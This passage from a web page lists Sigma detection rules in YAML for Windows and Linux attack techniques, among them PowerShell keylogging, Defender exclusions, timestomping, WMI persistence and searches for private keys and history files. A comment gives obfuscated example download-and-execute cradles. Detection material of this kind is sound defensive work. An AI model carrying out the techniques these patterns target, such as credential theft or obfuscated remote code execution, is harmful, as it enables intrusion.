- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.4
author: frack113
date: 2022-01-06
modified: 2023-01-02
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'New-PSSession'
- '-ComputerName '
condition: selection
falsepositives:
- Legitimate administrative script
level: medium
Convert to SIEM query
medium
PowerShell Script Run in AppData
Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
view Sigma YAML
title: PowerShell Script Run in AppData
id: ac175779-025a-4f12-98b0-acdaeb77ea85
status: test
description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
references:
- https://twitter.com/JohnLaTwC/status/1082851155481288706
- https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03
author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
date: 2019-01-09
modified: 2022-07-14
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection1:
CommandLine|contains:
- 'powershell.exe'
- '\powershell'
- '\pwsh'
- 'pwsh.exe'
selection2:
CommandLine|contains|all:
- '/c '
- '\AppData\'
CommandLine|contains:
- 'Local\'
- 'Roaming\'
condition: all of selection*
falsepositives:
- Administrative scripts
level: medium
Convert to SIEM query
medium
PowerShell Script With File Hostname Resolving Capabilities
Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.
view Sigma YAML
title: PowerShell Script With File Hostname Resolving Capabilities
id: fbc5e92f-3044-4e73-a5c6-1c4359b539de
status: test
description: Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.
references:
- https://www.fortypoundhead.com/showcontent.asp?artid=24022
- https://labs.withsecure.com/publications/fin7-target-veeam-servers
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-05
tags:
- attack.exfiltration
- attack.t1020
logsource:
product: windows
category: ps_script
definition: bade5735-5ab0-4aa7-a642-a11be0e40872
detection:
selection:
ScriptBlockText|contains|all:
- 'Get-content '
- 'foreach'
- '[System.Net.Dns]::GetHostEntry'
- 'Out-File'
condition: selection
falsepositives:
- The same functionality can be implemented by admin scripts, correlate with name and creator
level: medium
Convert to SIEM query
medium
PowerShell WMI Win32_Product Install MSI
Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class
view Sigma YAML
title: PowerShell WMI Win32_Product Install MSI
id: 91109523-17f0-4248-a800-f81d9e7c081d
status: test
description: Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
author: frack113
date: 2022-04-24
tags:
- attack.stealth
- attack.t1218.007
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'Invoke-CimMethod '
- '-ClassName '
- 'Win32_Product '
- '-MethodName '
- '.msi'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
PowerShell Write-EventLog Usage
Detects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use
view Sigma YAML
title: PowerShell Write-EventLog Usage
id: 35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e
status: test
description: Detects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use
references:
- https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-16
tags:
- attack.defense-impairment
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'Write-EventLog'
- '-RawData '
condition: selection
falsepositives:
- Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign
level: medium
Convert to SIEM query
medium
Powershell Create Scheduled Task
Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code
view Sigma YAML
title: Powershell Create Scheduled Task
id: 363eccc0-279a-4ccf-a3ab-24c2e63b11fb
status: test
description: Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task
author: frack113
date: 2021-12-28
modified: 2025-10-07
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_cmdlet:
ScriptBlockText|contains:
- 'New-ScheduledTaskAction'
- 'New-ScheduledTaskTrigger'
- 'New-ScheduledTaskPrincipal'
- 'New-ScheduledTaskSettingsSet'
- 'New-ScheduledTask'
- 'Register-ScheduledTask'
selection_cimmethod:
ScriptBlockText|contains|all:
- 'Invoke-CimMethod'
- '-ClassName'
- 'PS_ScheduledTask'
- '-NameSpace'
- 'Root\Microsoft\Windows\TaskScheduler'
filter_main_legitimate_scripts:
ScriptBlockText|contains|all:
- 'Microsoft.PowerShell.Core\Export-ModuleMember'
- 'Microsoft.Management.Infrastructure.CimInstance'
- '__cmdletization_methodParameter'
condition: 1 of selection_* and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Powershell Defender Exclusion
Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
view Sigma YAML
title: Powershell Defender Exclusion
id: 17769c90-230e-488b-a463-e05c08e9d48f
related:
- id: c1344fa2-323b-4d2e-9176-84b4d4821c88
type: similar
status: test
description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
references:
- https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
- https://twitter.com/AdamTheAnalyst/status/1483497517119590403
author: Florian Roth (Nextron Systems)
date: 2021-04-29
modified: 2022-05-12
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: process_creation
product: windows
detection:
selection1:
CommandLine|contains:
- 'Add-MpPreference '
- 'Set-MpPreference '
selection2:
CommandLine|contains:
- ' -ExclusionPath '
- ' -ExclusionExtension '
- ' -ExclusionProcess '
- ' -ExclusionIpAddress '
condition: all of selection*
falsepositives:
- Possible Admin Activity
- Other Cmdlets that may use the same parameters
level: medium
Convert to SIEM query
medium
Powershell Detect Virtualization Environment
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.
This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox
view Sigma YAML
title: Powershell Detect Virtualization Environment
id: d93129cd-1ee0-479f-bc03-ca6f129882e3
status: test
description: |
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.
This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md
- https://techgenix.com/malicious-powershell-scripts-evade-detection/
author: frack113, Duc.Le-GTSC
date: 2021-08-03
modified: 2022-03-03
tags:
- attack.discovery
- attack.stealth
- attack.t1497.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_action:
ScriptBlockText|contains:
- Get-WmiObject
- gwmi
selection_module:
ScriptBlockText|contains:
- MSAcpi_ThermalZoneTemperature
- Win32_ComputerSystem
condition: all of selection*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Powershell Directory Enumeration
Detects technique used by MAZE ransomware to enumerate directories using Powershell
view Sigma YAML
title: Powershell Directory Enumeration
id: 162e69a7-7981-4344-84a9-0f1c9a217a52
status: test
description: Detects technique used by MAZE ransomware to enumerate directories using Powershell
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md
- https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
author: frack113
date: 2022-03-17
tags:
- attack.discovery
- attack.t1083
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- foreach
- Get-ChildItem
- '-Path '
- '-ErrorAction '
- SilentlyContinue
- 'Out-File '
- '-append'
condition: selection
falsepositives:
- Legitimate PowerShell scripts
level: medium
Convert to SIEM query
medium
Powershell Execute Batch Script
Adversaries may abuse the Windows command shell for execution.
The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.
The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.
Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system
view Sigma YAML
title: Powershell Execute Batch Script
id: b5522a23-82da-44e5-9c8b-e10ed8955f88
status: test
description: |
Adversaries may abuse the Windows command shell for execution.
The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.
The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.
Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script
author: frack113
date: 2022-01-02
tags:
- attack.execution
- attack.t1059.003
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_start:
ScriptBlockText|contains: Start-Process
selection_batch:
ScriptBlockText|contains:
- '.cmd'
- '.bat'
condition: all of selection_*
falsepositives:
- Legitimate administration script
level: medium
Convert to SIEM query
medium
Powershell Executed From Headless ConHost Process
Detects the use of powershell commands from headless ConHost window.
The "--headless" flag hides the windows from the user upon execution.
view Sigma YAML
title: Powershell Executed From Headless ConHost Process
id: 056c7317-9a09-4bd4-9067-d051312752ea
related:
- id: 00ca75ab-d5ce-43be-b86c-55ff39c6abfc
type: derived
status: test
description: |
Detects the use of powershell commands from headless ConHost window.
The "--headless" flag hides the windows from the user upon execution.
references:
- https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
author: Matt Anderson (Huntress)
date: 2024-07-23
tags:
- attack.execution
- attack.stealth
- attack.t1059.001
- attack.t1059.003
- attack.t1564.003
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\conhost.exe'
- OriginalFileName: 'CONHOST.EXE'
selection_cli:
CommandLine|contains|all:
- '--headless'
- 'powershell'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml
Convert to SIEM query
medium
Powershell Inline Execution From A File
Detects inline execution of PowerShell code from a file
view Sigma YAML
title: Powershell Inline Execution From A File
id: ee218c12-627a-4d27-9e30-d6fb2fe22ed2
status: test
description: Detects inline execution of PowerShell code from a file
references:
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50
author: frack113
date: 2022-12-25
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: process_creation
detection:
selection_exec:
CommandLine|contains:
- 'iex '
- 'Invoke-Expression '
- 'Invoke-Command '
- 'icm '
selection_read:
CommandLine|contains:
- 'cat '
- 'get-content '
- 'type '
selection_raw:
CommandLine|contains: ' -raw'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Powershell Keylogging
Adversaries may log user keystrokes to intercept credentials as the user types them.
view Sigma YAML
title: Powershell Keylogging
id: 34f90d3c-c297-49e9-b26d-911b05a4866c
status: test
description: Adversaries may log user keystrokes to intercept credentials as the user types them.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1
author: frack113
date: 2021-07-30
modified: 2022-07-11
tags:
- attack.credential-access
- attack.collection
- attack.t1056.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_basic:
ScriptBlockText|contains: 'Get-Keystrokes'
selection_high: # want to run in background and keyboard
ScriptBlockText|contains|all:
- 'Get-ProcAddress user32.dll GetAsyncKeyState'
- 'Get-ProcAddress user32.dll GetForegroundWindow'
condition: 1 of selection_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Powershell Local Email Collection
Adversaries may target user email on local systems to collect sensitive information.
Files containing email data can be acquired from a users local system, such as Outlook storage or cache files.
view Sigma YAML
title: Powershell Local Email Collection
id: 2837e152-93c8-43d2-85ba-c3cd3c2ae614
status: test
description: |
Adversaries may target user email on local systems to collect sensitive information.
Files containing email data can be acquired from a users local system, such as Outlook storage or cache files.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md
author: frack113
date: 2021-07-21
modified: 2022-12-25
tags:
- attack.collection
- attack.t1114.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains:
- 'Get-Inbox.ps1'
- 'Microsoft.Office.Interop.Outlook'
- 'Microsoft.Office.Interop.Outlook.olDefaultFolders'
- '-comobject outlook.application'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Powershell LocalAccount Manipulation
Adversaries may manipulate accounts to maintain access to victim systems.
Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups
view Sigma YAML
title: Powershell LocalAccount Manipulation
id: 4fdc44df-bfe9-4fcc-b041-68f5a2d3031c
status: test
description: |
Adversaries may manipulate accounts to maintain access to victim systems.
Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1
author: frack113
date: 2021-12-28
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1098
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains:
- 'Disable-LocalUser'
- 'Enable-LocalUser'
- 'Get-LocalUser'
- 'Set-LocalUser'
- 'New-LocalUser'
- 'Rename-LocalUser'
- 'Remove-LocalUser'
condition: selection
falsepositives:
- Legitimate administrative script
level: medium
Convert to SIEM query
medium
Powershell MsXml COM Object
Adversaries may abuse PowerShell commands and scripts for execution.
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)
Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code
view Sigma YAML
title: Powershell MsXml COM Object
id: 78aa1347-1517-4454-9982-b338d6df8343
status: test
description: |
Adversaries may abuse PowerShell commands and scripts for execution.
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)
Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt
- https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)
- https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html
author: frack113, MatilJ
date: 2022-01-19
modified: 2022-05-19
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'New-Object'
- '-ComObject'
- 'MsXml2.'
- 'XmlHttp'
condition: selection
falsepositives:
- Legitimate administrative script
level: medium
Convert to SIEM query
medium
Powershell Sensitive File Discovery
Detect adversaries enumerate sensitive files
view Sigma YAML
title: Powershell Sensitive File Discovery
id: 7d416556-6502-45b2-9bad-9d2f05f38997
related:
- id: d23f2ba5-9da0-4463-8908-8ee47f614bb9
type: derived
status: test
description: Detect adversaries enumerate sensitive files
references:
- https://twitter.com/malmoeb/status/1570814999370801158
author: frack113
date: 2022-09-16
tags:
- attack.discovery
- attack.t1083
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_action:
ScriptBlockText|contains:
- ls
- get-childitem
- gci
selection_recurse:
ScriptBlockText|contains: '-recurse'
selection_file:
ScriptBlockText|contains:
- '.pass'
- '.kdbx'
- '.kdb'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Powershell Store File In Alternate Data Stream
Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
view Sigma YAML
title: Powershell Store File In Alternate Data Stream
id: a699b30e-d010-46c8-bbd1-ee2e26765fe9
status: test
description: Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md
author: frack113
date: 2021-09-02
modified: 2022-12-25
tags:
- attack.stealth
- attack.t1564.004
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_compspec:
ScriptBlockText|contains|all:
- 'Start-Process'
- '-FilePath "$env:comspec" '
- '-ArgumentList '
- '>'
condition: selection_compspec
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Powershell Timestomp
Adversaries may modify file time attributes to hide new or changes to existing files.
Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.
view Sigma YAML
title: Powershell Timestomp
id: c6438007-e081-42ce-9483-b067fbef33c3
status: test
description: |
Adversaries may modify file time attributes to hide new or changes to existing files.
Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md
- https://www.offensive-security.com/metasploit-unleashed/timestomp/
author: frack113
date: 2021-08-03
modified: 2022-12-25
tags:
- attack.stealth
- attack.t1070.006
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_ioc:
ScriptBlockText|contains:
- '.CreationTime ='
- '.LastWriteTime ='
- '.LastAccessTime ='
- '[IO.File]::SetCreationTime'
- '[IO.File]::SetLastAccessTime'
- '[IO.File]::SetLastWriteTime'
condition: selection_ioc
falsepositives:
- Legitimate admin script
level: medium
Convert to SIEM query
medium
Powershell Token Obfuscation - Powershell
Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation in Powershell scripts.
Use this rule as a threat-hunting baseline to find obfuscated scripts in your environment.
Once tested and tuned, consider deploying a production detection rule based on this hunting rule.
view Sigma YAML
title: Powershell Token Obfuscation - Powershell
id: f3a98ce4-6164-4dd4-867c-4d83de7eca51
related:
- id: deb9b646-a508-44ee-b7c9-d8965921c6b6
type: similar
status: test
description: |
Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation in Powershell scripts.
Use this rule as a threat-hunting baseline to find obfuscated scripts in your environment.
Once tested and tuned, consider deploying a production detection rule based on this hunting rule.
references:
- https://github.com/danielbohannon/Invoke-Obfuscation
author: frack113
date: 2022-12-27
modified: 2025-10-19
tags:
- attack.stealth
- attack.t1027.009
- detection.threat-hunting
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
# Examples:
# IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString
# &('In'+'voke-Expressi'+'o'+'n') (.('New-Ob'+'jec'+'t') Net.WebClient).DownloadString
# &("{2}{3}{0}{4}{1}"-f 'e','Expression','I','nvok','-') (&("{0}{1}{2}"-f'N','ew-O','bject') Net.WebClient).DownloadString
- ScriptBlockText|re: '\w+`(\w+|-|.)`[\w+|\s]'
# - ScriptBlockText|re: '\((\'(\w|-|\.)+\'\+)+\'(\w|-|\.)+\'\)' TODO: fixme
- ScriptBlockText|re: '"(\{\d\}){2,}"\s*-f' # trigger on at least two placeholders. One might be used for legitimate string formatting
# ${e`Nv:pATh}
- ScriptBlockText|re: '(?i)\$\{`?e`?n`?v`?:`?p`?a`?t`?h`?\}'
filter_envpath:
ScriptBlockText|contains: '${env:path}' # TODO: Fix this. See https://github.com/SigmaHQ/sigma/pull/4964
filter_chocolatey:
ScriptBlockText|contains:
- 'it will return true or false instead' # Chocolatey install script https://github.com/chocolatey/chocolatey
- 'The function also prevents `Get-ItemProperty` from failing' # https://docs.chocolatey.org/en-us/create/functions/get-uninstallregistrykey
filter_exchange:
Path|startswith: 'C:\Program Files\Microsoft\Exchange Server\'
Path|endswith: '\bin\servicecontrol.ps1'
ScriptBlockText|contains: '`r`n'
condition: selection and not 1 of filter_*
falsepositives:
- Edge case might be possible with heavy use of string formatting or obfuscation in legitimate scripts.
level: medium
Convert to SIEM query
medium
Powershell WMI Persistence
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.
view Sigma YAML
title: Powershell WMI Persistence
id: 9e07f6e7-83aa-45c6-998e-0af26efd0a85
status: test
description: Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md
- https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545
author: frack113
date: 2021-08-19
modified: 2022-12-25
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1546.003
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_ioc:
- ScriptBlockText|contains|all:
- 'New-CimInstance '
- '-Namespace root/subscription '
- '-ClassName __EventFilter '
- '-Property ' # is a variable name
- ScriptBlockText|contains|all:
- 'New-CimInstance '
- '-Namespace root/subscription '
- '-ClassName CommandLineEventConsumer '
- '-Property ' # is a variable name
condition: selection_ioc
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Powershell XML Execute Command
Adversaries may abuse PowerShell commands and scripts for execution.
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)
Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code
view Sigma YAML
title: Powershell XML Execute Command
id: 6c6c6282-7671-4fe9-a0ce-a2dcebdc342b
status: test
description: |
Adversaries may abuse PowerShell commands and scripts for execution.
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)
Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests
author: frack113
date: 2022-01-19
modified: 2023-01-19
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_xml:
ScriptBlockText|contains|all:
- 'New-Object'
- 'System.Xml.XmlDocument'
- '.Load'
selection_exec:
ScriptBlockText|contains:
- 'IEX '
- 'Invoke-Expression '
- 'Invoke-Command '
- 'ICM -'
condition: all of selection_*
falsepositives:
- Legitimate administrative script
level: medium
Convert to SIEM query
medium
Print History File Contents
Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
view Sigma YAML
title: Print History File Contents
id: d7821ff1-4527-4e33-9f84-d0d57fa2fb66
status: test
description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
references:
- https://github.com/sleventyeleven/linuxprivchecker/
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
author: Florian Roth (Nextron Systems)
date: 2022-06-20
modified: 2022-09-15
tags:
- attack.reconnaissance
- attack.t1592.004
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith:
- '/cat'
- '/head'
- '/tail'
- '/more'
selection_history:
- CommandLine|contains:
- '/.bash_history'
- '/.zsh_history'
- CommandLine|endswith:
- '_history'
- '.history'
- 'zhistory'
condition: all of selection*
falsepositives:
- Legitimate administration activities
level: medium
Convert to SIEM query
medium
Private Keys Reconnaissance Via CommandLine Tools
Adversaries may search for private key certificate files on compromised systems for insecurely stored credential
view Sigma YAML
title: Private Keys Reconnaissance Via CommandLine Tools
id: 213d6a77-3d55-4ce8-ba74-fcfef741974e
status: test
description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2021-07-20
modified: 2023-03-06
tags:
- attack.credential-access
- attack.t1552.004
logsource:
category: process_creation
product: windows
detection:
selection_cmd_img:
- Image|endswith: '\cmd.exe'
- OriginalFileName: 'Cmd.Exe'
selection_cmd_cli:
CommandLine|contains: 'dir '
selection_pwsh_img:
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell.EXE'
- 'pwsh.dll'
selection_pwsh_cli:
CommandLine|contains: 'Get-ChildItem '
selection_findstr:
- Image|endswith: '\findstr.exe'
- OriginalFileName: 'FINDSTR.EXE'
selection_ext:
CommandLine|contains:
- '.key'
- '.pgp'
- '.gpg'
- '.ppk'
- '.p12'
- '.pem'
- '.pfx'
- '.cer'
- '.p7b'
- '.asc'
condition: selection_ext and (all of selection_cmd_* or all of selection_pwsh_* or selection_findstr)
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Privileged Account Creation
Detects when a new admin is created.
view Sigma YAML
title: Privileged Account Creation
id: f7b5b004-dece-46e4-a4a5-f6fd0e1c6947
status: test
description: Detects when a new admin is created.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton
date: 2022-08-11
modified: 2022-08-16
tags:
- attack.initial-access
- attack.persistence
- attack.privilege-escalation
- attack.stealth
- attack.t1078.004
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message|contains|all:
- Add user
- Add member to role
Status: Success
condition: selection
falsepositives:
- A legitimate new admin account being created
level: medium
Convert to SIEM query
medium
Procdump Execution
Detects usage of the SysInternals Procdump utility
view Sigma YAML
title: Procdump Execution
id: 2e65275c-8288-4ab4-aeb7-6274f58b6b20
status: test
description: Detects usage of the SysInternals Procdump utility
references:
- https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
author: Florian Roth (Nextron Systems)
date: 2021-08-16
modified: 2023-02-28
tags:
- attack.stealth
- attack.t1036
- attack.t1003.001
- attack.credential-access
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\procdump.exe'
- '\procdump64.exe'
condition: selection
falsepositives:
- Legitimate use of procdump by a developer or administrator
level: medium
Convert to SIEM query
medium
Process Creation Using Sysnative Folder
Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
view Sigma YAML
title: Process Creation Using Sysnative Folder
id: 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab
status: test
description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
references:
- https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
author: Max Altgelt (Nextron Systems)
date: 2022-08-23
modified: 2025-10-08
tags:
- attack.privilege-escalation
- attack.stealth
- attack.t1055
logsource:
category: process_creation
product: windows
detection:
selection:
- CommandLine|contains: ':\Windows\Sysnative\'
- Image|contains: ':\Windows\Sysnative\'
filter_main_ngen:
Image|contains:
- 'C:\Windows\Microsoft.NET\Framework64\v'
- 'C:\Windows\Microsoft.NET\Framework\v'
- 'C:\Windows\Microsoft.NET\FrameworkArm\v'
- 'C:\Windows\Microsoft.NET\FrameworkArm64\v'
Image|endswith: '\ngen.exe'
CommandLine|contains: 'install'
filter_optional_xampp:
CommandLine|contains|all:
- '"C:\Windows\sysnative\cmd.exe"'
- '\xampp\'
- '\catalina_start.bat'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Process Deletion of Its Own Executable
Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces.
view Sigma YAML
title: Process Deletion of Its Own Executable
id: f01d1f70-cd41-42ec-9c0b-26dd9c22bf29
status: test
description: |
